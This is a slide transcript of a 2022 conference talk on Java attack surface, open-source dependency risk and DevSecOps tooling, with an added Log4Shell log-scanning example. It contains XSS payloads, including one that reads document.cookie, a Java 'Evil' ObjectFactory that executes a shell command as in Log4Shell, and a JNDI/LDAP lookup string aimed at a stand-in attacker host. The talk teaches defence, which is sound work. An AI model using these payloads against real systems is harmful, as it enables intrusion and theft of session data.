Stranger Danger: Your Java Attack Surface Just Got Bigger | JBCNConf 2022

  1. 1. Stranger Danger: Your Java Attack Surface Just Got Bigger Brian Vermeer | @BrianVerm JBCNConf 2022
  2. 2. @BrianVerm DevSecOps
  3. 3. @BrianVerm Brian Vermeer Sr. Developer Advocate DevSecCon co-leader NLJUG leader Virtual JUG leader Java Champion Foojay Community Manager Security
  4. 4. @BrianVerm What are the problems?
      Lack of security focus throughout the app lifecycle
      Software delivery sped up with little thought to security
      Silo-ed security expertise
      Customer data could be compromised
  5. 5. @BrianVerm How bad is the Situation?
  6. 6. @BrianVerm The modern application: A New Risk Profile
      ● 80-90% of codebase is Open Source
      ● 80% of vulnerabilities found in indirect dependencies
      ● 100s of Linux packages inherited from public sources
      ● Built, deployed & scaled in seconds
      ● #1 cloud vulnerability is misconfiguration [NSA]
      ● Network access, storage, servers - deployed as fast as code
      ● 10-20% of code is custom - and digital transformation increases pressure to deliver more and faster.
      Columns: Code | Open Source | Containers | Infrastructure as Code
  9. 9. @BrianVerm /hello?user=<script>alert(1)</script>
  10. 10. @BrianVerm
      <script>alert(1)</script>
      <b onmouseover=alert('Woof!')>click me!</b>
      <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>
      <IMG SRC=j&#X41vascript:alert('test2')>

  12. 12. 2.0B cost so far | 76d until discovered | 140M US consumers affected
  13. 13. @BrianVerm Your app
  14. 14. @BrianVerm Your app / Your code
  15. 15. Spring Serverless Example: 222 Lines of Code; 5 Direct dependencies; 54 dependencies (incl. indirect); 460,046 Lines of Code
  16. 16. @BrianVerm Open Source Usage Has Exploded
  17. 17. @BrianVerm Attackers Are Targeting Open Source: One Vulnerability, many victims
  18. 18. @BrianVerm New Packages Created by ecosystem per year
  19. 19. @BrianVerm Vulnerabilities identified in ecosystems
  20. 20. @BrianVerm Vulnerabilities in direct versus indirect dependencies
  21. 21. 57% of projects have Log4j as transitive dependency | 800K attempted attacks in 72h | 17K Java packages impacted
  22. 22. @BrianVerm Log4J: JNDI & LDAP

  23. 23. @BrianVerm soo
      public class Evil implements ObjectFactory {
          @Override
          public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {
              String[] cmd = { "/bin/sh", "-c", "open -a Calculator" };
              Runtime.getRuntime().exec(cmd);
              return null;
          }
      }
  24. 24. @BrianVerm https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-44228/
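The Log4J slides above show the exploitation side: a JNDI lookup in a logged string resolves, via LDAP, to an attacker-supplied ObjectFactory that runs code. As an added defender-side example, not from the deck, here is a baseline scan of access-log lines for the lookup strings that trigger that path. JndiLookupScan and its Finding record are names chosen for this example, and the log lines (including the attacker.example host) are constructed.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;

// Hypothetical class for this example; not part of Log4j or the talk.
public class JndiLookupScan {

    // The literal "${jndi:" lookup (any case, optional whitespace), the form
    // that appeared in request headers immediately after disclosure.
    private static final Pattern JNDI =
        Pattern.compile("\\$\\{\\s*jndi\\s*:", Pattern.CASE_INSENSITIVE);

    // A "${" opened while another "${" is still open. Nested lookups are rare
    // in legitimate request data and are how the literal above gets disguised,
    // so they are reported for review rather than silently accepted. This is a
    // heuristic, not a Log4j lookup parser; it is a first filter, not proof of
    // exploitation, and the real fix remains upgrading Log4j.
    private static final Pattern NESTED = Pattern.compile("\\$\\{[^}]*\\$\\{");

    public record Finding(int lineNo, String reason, String line) {}

    // Returns one finding per suspicious line; clean lines produce nothing.
    public static List<Finding> scan(List<String> lines) {
        List<Finding> out = new ArrayList<>();
        for (int i = 0; i < lines.size(); i++) {
            String l = lines.get(i);
            if (JNDI.matcher(l).find()) {
                out.add(new Finding(i + 1, "jndi lookup", l));
            } else if (NESTED.matcher(l).find()) {
                out.add(new Finding(i + 1, "nested lookup (review)", l));
            }
        }
        return out;
    }

    public static void main(String[] args) {
        // Constructed access-log lines: client, request, status, User-Agent.
        List<String> sample = List.of(
            "10.0.0.5 GET /hello?user=brian 200 \"Mozilla/5.0\"",
            "10.0.0.9 GET /hello 200 \"${jndi:ldap://attacker.example/a}\"",
            "10.0.0.9 GET /hello 200 \"${${env:NOPE}:x}\"",
            "10.0.0.7 GET /health 200 \"curl/7.79\"");
        for (Finding f : scan(sample)) {
            System.out.println("line " + f.lineNo() + ": " + f.reason() + " -> " + f.line());
        }
    }
}
```

Run it against a copy of the logs rather than in the request path: the point is to learn which hosts were probed and which services logged attacker-controlled strings, which is exactly the question the "How do you find out about new vulns in your deployed containers?" slide raises. Any hit on a service still running an affected Log4j version should be treated as a potential compromise, not just a blocked attempt.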
  25. 25. @BrianVerm OS maintainers are confident in their own security knowledge
  26. 26. @BrianVerm
  27. 27. @BrianVerm Who should be responsible for security?
  30. 30. @BrianVerm Vulnerabilities per Docker image
  31. 31. @BrianVerm When do you scan your Docker image for OS vulns?
  32. 32. @BrianVerm How do you find out about new vulns in your deployed containers?
  33. 33. @BrianVerm Let’s HACK!
  35. 35. @BrianVerm What is the Solution?
      Culture: What do people care about and how should they collaborate
      Process: The best way to adopt a new practice is to integrate into existing processes
      Tooling: Pick the tooling that fits your process; Automate away manual steps
  36. 36. @BrianVerm Snyk Code
  37. 37. @BrianVerm Snyk Open Source
  38. 38. @BrianVerm Snyk Container
  39. 39. @BrianVerm Snyk Infrastructure as Code
  40. 40. @BrianVerm DevSecOps: Continuous Security, Integrated throughout DevOps
      Code (Test & fix) -> submit -> Git repository (Test, fix, monitor) -> build -> CI/CD (Test, fix, monitor) -> deploy -> Registry -> Production: Traditional/PaaS, Serverless, Kubernetes (Monitor & more...)
  41. 41. @BrianVerm “Shift left” is not enough: Empowering developers to build applications securely within the entire development process. Empower developers; Enable security teams
  42. 42. @BrianVerm Thank you Develop fast. Stay secure.